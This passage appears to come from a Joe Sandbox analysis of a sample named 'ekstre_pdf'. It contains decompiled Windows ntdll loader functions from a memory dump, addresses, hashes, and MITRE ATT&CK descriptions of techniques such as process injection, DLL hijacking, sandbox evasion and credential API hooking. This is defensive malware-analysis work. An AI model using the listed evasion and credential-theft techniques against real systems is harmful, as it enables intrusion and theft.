					 *((intOrPtr*)(_t332 + 4)) = _t375;
					_v251 = 1;
					_v8 = 2;
					L71();
					E340A8F40( &_v216, 0, 0x98);
					_t389 = _t389 + 0xc;
					asm("lock inc dword [edi+0xf8]");
					_v250 = 1;
					_t371 =  &_v44;
					_t347 = _t377;
					E34064A09(_t377,  &_v44, 0);
					goto L8;
				}
				_t339 =  *((intOrPtr*)(_t377 + 0x24));
				_v388 = _t339;
				_push(_t339);
				_t340 = E340A29A0();
				_v276 = _t340;
				if(_t340 < 0) {
					goto L73;
				}
				asm("lock inc dword [edi]");
				_v246 = 1;
				goto L5;
			}

0x340658e0
0x340658e0
0x340658e0
0x340658e5
0x340658e7
0x340658ec
0x340658f7
0x340658f8
0x340658fe
0x34065903
0x34065906
0x34065908
0x3406590b
0x3406590c
0x3406590d
0x3406590e
0x34065912
0x34065918
0x3406591b
0x3406591e
0x34065928
0x3406592e
0x34065935
0x3406593c
0x34065943
0x3406594a
0x34065951
0x34065958
0x3406595f
0x34065966
0x34065970
0x3406597a
0x34065985
0x3406598b
0x34065998
0x3406599d
0x340659a3
0x340659a8
0x340659b0
0x340659b2
0x340659b8
0x340659b8
0x340659c8
0x340659cd
0x340659d0
0x340659d7
0x340659e5
0x340659ea
0x340659f8
0x340c0745
0x340c074f
0x340c074f
0x340c0756
0x34065a25
0x34065a25
0x34065a2c
0x34065a31
0x34065a38
0x34065fef
0x34065fef
0x34065ff6
0x34065ffb
0x34066002
0x34066007
0x34066007
0x34066009
0x3406600f
0x34066017
0x3406601c
0x3406601c
0x34065b95
0x34065b99
0x34065f2d
0x34065f32
0x34065f36
0x34065f36
0x34065ba1
0x34065fcf
0x34065fcf
0x34065fd4
0x00000000
0x00000000
0x34065fd6
0x34065fd6
0x34065fd9
0x340c07dc
0x340c07e3
0x340c07e5
0x340c07ea
0x00000000
0x340c07ea
0x34065fdf
0x34065fe2
0x00000000
0x00000000
0x34065fe8
0x00000000
0x34065ba7
0x34065ba9
0x34065e71
0x34065e77
0x34065e79
0x34065bb4
0x34065bba
0x340c0836
0x340c083a
0x340c0841
0x340c0847
0x340c0847
0x34065bd4
0x34065bda
0x34065be0
0x34065be7
0x00000000
0x34065bed
0x34065bf3
0x34065ae0
0x34065ae0
0x34065aec
0x34065aef
0x34065af2
0x34065af5
0x34065af8
0x34065afb
0x34065b07
0x34065f69
0x34065f73
0x34065f8b
0x34065f90
0x34065f92
0x340c077f
0x340c077f
0x340c0789
0x34065b43
0x34065b43
0x34065b49
0x34065b53
0x34065b5a
0x34065b5d
0x34065b66
0x34065b67
0x34065b6d
0x34065b6e
0x34065b74
0x34065b7a
0x34065b7b
0x34065b80
0x34065b86
0x34065b8f
0x00000000
0x00000000
0x00000000
0x34065b8f
0x34065f98
0x34065f98
0x34065f9e
0x34065fa0
0x34065fa7
0x34065fae
0x34065fb1
0x00000000
0x34065fb1
0x34065b13
0x00000000
0x00000000
0x34065b19
0x34065b30
0x34065b35
0x34065b3b
0x34065b41
0x00000000
0x34065b41
0x34065bf9
0x34065bfe
0x34065e84
0x34065e8d
0x34065e93
0x34065ea1
0x34065ea9
0x34065eb4
0x34065eb9
0x34065ec0
0x34065ec6
0x34065ec7
0x34065ed0
0x34065ed1
0x34065ed2
0x34065ed8
0x34065f15
0x34065d52
0x34065d52
0x34065d59
0x34065d60
0x340c0909
0x340c0909
0x34065d6d
0x34065d74
0x34065d81
0x34065d86
0x34065d8d
0x34065d9e
0x340c0955
0x340c0958
0x340c095e
0x340c0960
0x340c0963
0x340c0969
0x340c0969
0x340c096f
0x340c096f
0x340c096f
0x340c096f
0x340c0971
0x340c0977
0x340c0979
0x340c0989
0x340c0992
0x340c0998
0x340c099c
0x340c099e
0x340c09a4
0x340c09a6
0x340c09ac
0x340c09ac
0x340c09b4
0x340c09b4
0x340c09bc
0x340c09c6
0x340c09ce
0x340c09cf
0x340c09d1
0x340c09d4
0x34065da4
0x34065da4
0x34065dac
0x34065f0b
0x34065f0b
0x34065db8
0x340c09e2
0x340c09e9
0x340c09ef
0x340c09ef
0x34065dbe
0x34065dc1
0x34065dc7
0x34065dc9
0x34065dcc
0x34065dd2
0x34065de0
0x34065de0
0x34065de2
0x34065de8
0x34065dea
0x34065df0
0x34065df3
0x34065e00
0x00000000
0x00000000
0x34065e08
0x34065eec
0x34065eef
0x340c09f9
0x340c0a00
0x00000000
0x00000000
0x340c0a06
0x34065ef7
0x34065f00
0x34065e29
0x34065e29
0x34065e2c
0x34065e34
0x34065e38
0x34065e3a
0x34065e40
0x34065e42
0x34065e4e
0x00000000
0x34065e58
0x34065e58
0x34065e5e
0x34065e66
0x00000000
0x00000000
0x00000000
0x34065e6c
0x34065e4e
0x34065e0e
0x34065e0e
0x34065e21
0x34065e23
0x00000000
0x34065e23
0x34065de0
0x00000000
0x34065d9e
0x34065eda
0x34065ee0
0x34065f53
0x34065f59
0x3406602d
0x34066033
0x34066035
0x00000000
0x34066035
0x34065f5f
0x00000000
0x34065f5f
0x34065ee2
0x00000000
0x34065ee2
0x34065c04
0x34065c0a
0x34065c0b
0x34065c11
0x34065c1a
0x00000000
0x00000000
0x34065c24
0x34066047
0x3406604c
0x3406604c
0x34065c2a
0x34065c30
0x34065c3a
0x34065c40
0x34065c4c
0x34065c52
0x34065c5f
0x34065c68
0x34065c71
0x34065c7a
0x34065c7d
0x34065c85
0x34065c9e
0x34065ca1
0x34065ca7
0x34065cad
0x34065cba
0x340c087c
0x34065cc0
0x34065cc0
0x34065cc0
0x34065cc4
0x340c0886
0x340c0889
0x340c0889
0x34065cd1
0x340c0897
0x340c0897
0x34065cf0
0x340c08a2
0x340c08a2
0x34065cf6
0x34065cfc
0x34065d09
0x340c08ae
0x340c08ae
0x34065d0f
0x34065d15
0x34065d22
0x340c08ba
0x340c08ba
0x34065d22
0x34065d28
0x34065d2f
0x34065d37
0x34065d39
0x34065d40
0x34065d47
0x34065f41
0x34065f47
0x34065fc2
0x34065fc8
0x34065f49
0x34065f49
0x34065f49
0x34065d4d
0x34065d4d
0x34065d4d
0x00000000
0x34065d47
0x34065be7
0x34065e7f
0x34065baf
0x00000000
0x34065baf
0x34065ba1
0x34065a46
0x34065a4b
0x34065a52
0x34065a5f
0x34065a64
0x34065a6b
0x34065a71
0x34065a76
0x340c0772
0x34066068
0x34066073
0x34066073
0x34065a7c
0x34065a82
0x34065a88
0x34065a8e
0x34065a92
0x34065a95
0x34065a9c
0x34065aa3
0x34065ab6
0x34065abb
0x34065abe
0x34065ac5
0x34065ace
0x34065ad1
0x34065ad3
0x00000000
0x34065ad3
0x340659fe
0x34065a01
0x34065a07
0x34065a08
0x34065a0d
0x34065a15
0x00000000
0x00000000
0x34065a1b
0x34065a1e
0x00000000

Strings

@, xrefs: 340C08AE

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 9238448567286d935ae6ec98abef14b9ec439ce7a96a4bbfa795e132377f3074
Instruction ID: 7049290b5e3e59dacfb1dc7ef7a4ba09952369315ae51d3bc77d53dac9bf951e
Opcode Fuzzy Hash: 9238448567286d935ae6ec98abef14b9ec439ce7a96a4bbfa795e132377f3074
Instruction Fuzzy Hash: 2A323674A00269DFEB61CFA4C984BDDBBF4FB08308F0041E9D54AA7291DB795A84DF91

Uniqueness

Uniqueness Score: -1.00%

Function 34094B79 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E34094B79(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				signed int _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				signed int _v72;
				intOrPtr _v76;
				signed int _v84;
				signed int _v88;
				char _v92;
				signed int _v96;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t82;
				signed int _t86;
				signed int _t89;
				intOrPtr* _t97;
				signed int _t99;
				void* _t102;
				void* _t104;
				signed int _t111;
				intOrPtr* _t112;
				intOrPtr* _t113;
				signed int _t114;
				void* _t115;

				_t107 = __edx;
				_t72 =  *0x3415b370 ^ _t114;
				_v8 =  *0x3415b370 ^ _t114;
				_t110 = __ecx;
				_v96 = __edx;
				_t99 = __edx;
				if(__edx == 0 || ( *(__edx + 8) & 0x00000004) != 0) {
					L12:
					return E340A4B50(_t72, _t97, _v8 ^ _t114, _t107, _t110, _t111);
				} else {
					_t110 = __ecx + 4;
					_t97 =  *_t110;
					while(_t97 != _t110) {
						_t6 = _t97 - 8; // -4
						_t111 = _t6;
						_t107 = 1;
						if( *_t111 != 0x74736c46) {
							_v84 = _v84 & 0x00000000;
							_push( &_v92);
							_v76 = 4;
							_v72 = 1;
							_v68 = 1;
							_v64 = _t110;
							_v60 = _t111;
							_v92 = 0xc0150015;
							_v88 = 1;
							E340B8A60(_t99, 1);
							_t99 = _v96;
							_t107 = 1;
						}
						if( *(_t111 + 0x14) !=  !( *(_t111 + 4))) {
							_v84 = _v84 & 0x00000000;
							_push( &_v92);
							_v76 = 4;
							_v72 = _t107;
							_v68 = 2;
							_v64 = _t110;
							_v60 = _t111;
							_v92 = 0xc0150015;
							_v88 = _t107;
							E340B8A60(_t99, _t107);
							_t99 = _v96;
						}
						_t9 = _t111 + 0x18; // 0x1c
						_t72 = _t9;
						if(_t99 < _t9) {
							L13:
							_t97 =  *_t97;
							continue;
						} else {
							_t10 = _t111 + 0x618; // 0x614
							_t72 = _t10;
							if(_t99 >= _t10) {
								goto L13;
							} else {
								_v96 = 0x30;
								_t82 = _t99 - _t111 - 0x18;
								asm("cdq");
								_t107 = _t82 % _v96;
								_t72 = 0x18 + _t82 / _v96 * 0x30 + _t111;
								if(_t99 == 0x18 + _t82 / _v96 * 0x30 + _t111) {
									_t72 =  *(_t111 + 4);
									if(_t72 != 0) {
										_t86 = _t72 - 1;
										 *(_t111 + 4) = _t86;
										_t72 =  !_t86;
										 *(_t111 + 0x14) =  !_t86;
										 *((intOrPtr*)(_t99 + 8)) = 4;
										if( *(_t111 + 4) == 0) {
											_t72 =  *(_t97 + 4);
											if(_t72 != _t110) {
												do {
													_t111 =  *(_t72 + 4);
													_t56 = _t72 - 8; // 0xfffffff6
													_t107 = _t56;
													if( *((intOrPtr*)(_t107 + 4)) != 0) {
														goto L33;
													} else {
														_t102 =  *_t72;
														if( *(_t102 + 4) != _t72 ||  *_t111 != _t72) {
															_push(3);
															asm("int 0x29");
															_t104 = 0x3f;
															if( *((intOrPtr*)(_t72 + 2)) == _t104 &&  *(_t72 + 4) == _t104 &&  *((intOrPtr*)(_t72 + 6)) == _t111 &&  *(_t72 + 8) != _t97 &&  *((short*)(_t72 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t72 + 0xc)) == _t111) {
																_t72 = _t72 + 8;
															}
															_t112 =  *0x341565e4; // 0x759cf0e0
															 *0x341591e0(_t107, _t72,  &_v8);
															_t113 =  *_t112();
															if(_t113 >= 0) {
																L18:
																_t89 = _v8;
																if(_t89 != 0) {
																	if( *(_t110 + 0x48) != _t97) {
																		E340626A0(_t89,  *(_t110 + 0x48));
																		_t89 = _v8;
																	}
																	 *(_t110 + 0x48) = _t89;
																}
																if(_t113 < 0) {
																	if(( *0x341537c0 & 0x00000003) != 0) {
																		E340DE692("minkernel\\ntdll\\ldrsnap.c", 0x2eb, "LdrpFindDllActivationContext", _t97, "Querying the active activation context failed with status 0x%08lx\n", _t113);
																	}
																	if(( *0x341537c0 & 0x00000010) != 0) {
																		asm("int3");
																	}
																}
																return _t113;
															} else {
																if(_t113 != 0xc000008a) {
																	if(_t113 == 0xc000008b || _t113 == 0xc0000089 || _t113 == 0xc000000f || _t113 == 0xc0000204 || _t113 == 0xc0000002) {
																		goto L16;
																	} else {
																		if(_t113 != 0xc00000bb) {
																			goto L18;
																		} else {
																			goto L16;
																		}
																	}
																	goto L53;
																} else {
																	L16:
																	if(( *0x341537c0 & 0x00000005) != 0) {
																		_push(_t113);
																		_t67 = _t110 + 0x24; // 0x123
																		E340DE692("minkernel\\ntdll\\ldrsnap.c", 0x2ce, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t67);
																		_t115 = _t115 + 0x1c;
																	}
																	_t113 = _t97;
																}
																goto L18;
															}
														} else {
															 *_t111 = _t102;
															 *(_t102 + 4) = _t111;
															E34073BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t107);
															goto L33;
														}
													}
													goto L53;
													L33:
													_t72 = _t111;
												} while (_t111 != _t110);
											}
										}
									}
								}
								goto L12;
							}
						}
						goto L53;
					}
					goto L12;
				}
				L53:
			}

0x34094b79
0x34094b86
0x34094b88
0x34094b8e
0x34094b90
0x34094b93
0x34094b97
0x34094c27
0x34094c35
0x34094ba7
0x34094ba7
0x34094baa
0x34094bac
0x34094bb2
0x34094bb2
0x34094bb5
0x34094bbc
0x340d330f
0x340d3316
0x340d3317
0x340d331e
0x340d3321
0x340d3324
0x340d3327
0x340d332a
0x340d3331
0x340d3334
0x340d3339
0x340d333e
0x340d333e
0x34094bca
0x340d3344
0x340d334b
0x340d334c
0x340d3353
0x340d3356
0x340d335d
0x340d3360
0x340d3363
0x340d336a
0x340d336d
0x340d3372
0x340d3372
0x34094bd0
0x34094bd0
0x34094bd5
0x34094c36
0x34094c36
0x00000000
0x34094bd7
0x34094bd7
0x34094bd7
0x34094bdf
0x00000000
0x34094be1
0x34094be3
0x34094bec
0x34094bef
0x34094bf0
0x34094bf9
0x34094bfd
0x34094bff
0x34094c04
0x34094c06
0x34094c07
0x34094c0a
0x34094c0c
0x34094c0f
0x34094c1a
0x34094c1c
0x34094c21
0x340d337a
0x340d337a
0x340d337d
0x340d337d
0x340d3384
0x00000000
0x340d3386
0x340d3386
0x340d338b
0x340d33b2
0x340d33b5
0x340d33b9
0x340d33be
0x340d33f7
0x340d33f7
0x34094c76
0x34094c84
0x34094c8c
0x34094c90
0x34094ca9
0x34094ca9
0x34094cae
0x34094ce4
0x34094cee
0x34094cf3
0x34094cf3
0x34094ce6
0x34094ce6
0x34094cb2
0x340d3463
0x340d347b
0x340d3480
0x340d348a
0x340d3490
0x340d3490
0x340d348a
0x34094cbe
0x34094c92
0x34094c98
0x34094cc5
0x00000000
0x340d3423
0x340d3429
0x00000000
0x340d342f
0x00000000
0x340d342f
0x340d3429
0x00000000
0x34094c9a
0x34094c9a
0x34094ca1
0x340d3434
0x340d3435
0x340d344f
0x340d3454
0x340d3454
0x34094ca7
0x34094ca7
0x00000000
0x34094c98
0x340d3391
0x340d3398
0x340d339c
0x340d33a2
0x00000000
0x340d33a2
0x340d338b
0x00000000
0x340d33a7
0x340d33a7
0x340d33a9
0x340d33ad
0x34094c21
0x34094c1a
0x34094c04
0x00000000
0x34094bfd
0x34094bdf
0x00000000
0x34094bd5
0x00000000
0x34094bac
0x00000000

Strings

Flst, xrefs: 34094BB6
0, xrefs: 34094BE3

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID: 0$Flst
API String ID: 0-758220159
Opcode ID: af9d9f4ac4372518652ebc72c4c489f2a060449dcf001c5ed763fc7da8c54a37
Instruction ID: 97382d893efc34785bf90c3192fbce5c8e4266bf697b00ee473205c963389497
Opcode Fuzzy Hash: af9d9f4ac4372518652ebc72c4c489f2a060449dcf001c5ed763fc7da8c54a37
Instruction Fuzzy Hash: 92517BB5B147488FEB14CFA5C98469DFBF4EF44794F1482AED045AB260EBB09985CB80

Uniqueness

Uniqueness Score: -1.00%

Function 3405DF21 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109
timeCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E3405DF21(void* __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v36;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr* _t52;
				char _t56;
				void* _t69;
				char _t72;
				void* _t73;
				intOrPtr _t75;
				intOrPtr _t79;
				void* _t82;
				void* _t84;
				intOrPtr _t86;
				void* _t88;
				signed int _t90;
				signed int _t92;
				signed int _t93;

				_t80 = __edx;
				_t92 = (_t90 & 0xfffffff8) - 0x4c;
				_v8 =  *0x3415b370 ^ _t92;
				_t72 = 0;
				_v72 = __edx;
				_t82 = __ecx;
				_t86 =  *((intOrPtr*)(__edx + 0xc8));
				_v68 = _t86;
				E340A8F40( &_v60, 0, 0x30);
				_t48 =  *((intOrPtr*)(_t82 + 0x70));
				_t93 = _t92 + 0xc;
				_v76 = _t48;
				_t49 = _t48;
				if(_t49 == 0) {
					_push(5);
					 *((char*)(_t82 + 0x6a)) = 0;
					 *((intOrPtr*)(_t82 + 0x6c)) = 0;
					goto L3;
				} else {
					_t69 = _t49 - 1;
					if(_t69 != 0) {
						if(_t69 == 1) {
							_push(0xa);
							goto L3;
						} else {
							_t56 = 0;
						}
					} else {
						_push(4);
						L3:
						_pop(_t50);
						_v80 = _t50;
						if(_a4 == _t72 && _t86 != 0 && _t50 != 0xa &&  *((char*)(_t82 + 0x6b)) == 1) {
							L34072330(_t50, _t86 + 0x1c);
							_t79 = _v72;
							 *((intOrPtr*)(_t79 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
							 *((intOrPtr*)(_t79 + 0x88)) =  *((intOrPtr*)(_t82 + 0x68));
							 *((intOrPtr*)(_t79 + 0x8c)) =  *((intOrPtr*)(_t82 + 0x6c));
							 *((intOrPtr*)(_t79 + 0x90)) = _v80;
							 *((intOrPtr*)(_t79 + 0x20)) = _t72;
							E340724D0(_t86 + 0x1c);
						}
						_t75 = _v80;
						_t52 =  *((intOrPtr*)(_v72 + 0x20));
						_t80 =  *_t52;
						_v72 =  *((intOrPtr*)(_t52 + 4));
						_v52 =  *((intOrPtr*)(_t82 + 0x68));
						_v60 = 0x30;
						_v56 = _t75;
						_v48 =  *((intOrPtr*)(_t82 + 0x6c));
						asm("movsd");
						_v76 = _t80;
						_v64 = 0x30;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						if(_t80 != 0) {
							 *0x341591e0(_t75, _v72,  &_v64,  &_v60);
							_t72 = _v76();
						}
						_t56 = _t72;
					}
				}
				_pop(_t84);
				_pop(_t88);
				_pop(_t73);
				return E340A4B50(_t56, _t73, _v8 ^ _t93, _t80, _t84, _t88);
			}

0x3405df21
0x3405df29
0x3405df33
0x3405df3b
0x3405df40
0x3405df44
0x3405df46
0x3405df52
0x3405df56
0x3405df5b
0x3405df5e
0x3405df61
0x3405df65
0x3405df67
0x3405e058
0x3405e05a
0x3405e05d
0x00000000
0x3405df6d
0x3405df6d
0x3405df70
0x340bd6ea
0x340bd6f3
0x00000000
0x340bd6ec
0x340bd6ec
0x340bd6ec
0x3405df76
0x3405df76
0x3405df78
0x3405df78
0x3405df79
0x3405df80
0x3405e019
0x3405e024
0x3405e02c
0x3405e032
0x3405e03b
0x3405e045
0x3405e04b
0x3405e04e
0x3405e04e
0x3405df8d
0x3405df91
0x3405df94
0x3405df99
0x3405dfa0
0x3405dfab
0x3405dfb3
0x3405dfb7
0x3405dfbb
0x3405dfbc
0x3405dfc0
0x3405dfc8
0x3405dfc9
0x3405dfca
0x3405dfcd
0x3405dfe0
0x3405dfea
0x3405dfea
0x3405dfec
0x3405dfec
0x3405df70
0x3405dff2
0x3405dff3
0x3405dff4
0x3405dfff

APIs

RtlDebugPrintTimes.NTDLL ref: 3405DFE0

Strings

0, xrefs: 3405DFAB
0, xrefs: 3405DFC0

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID: DebugPrintTimes
String ID: 0$0
API String ID: 3446177414-203156872
Opcode ID: cf64ea6733359fac5be5ef809a3b0c756a7a6d698dc809c2a33f9b52d38dcfd7
Instruction ID: 29fe345464f2dfbf1c2600aab0552f1aacdde47fd5a00044080dadd69fbd675e
Opcode Fuzzy Hash: cf64ea6733359fac5be5ef809a3b0c756a7a6d698dc809c2a33f9b52d38dcfd7
Instruction Fuzzy Hash: 5B413BB56087019FD300CF28C544A5ABBE9FF88354F0485AEF598DB251D771EA05CB96

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

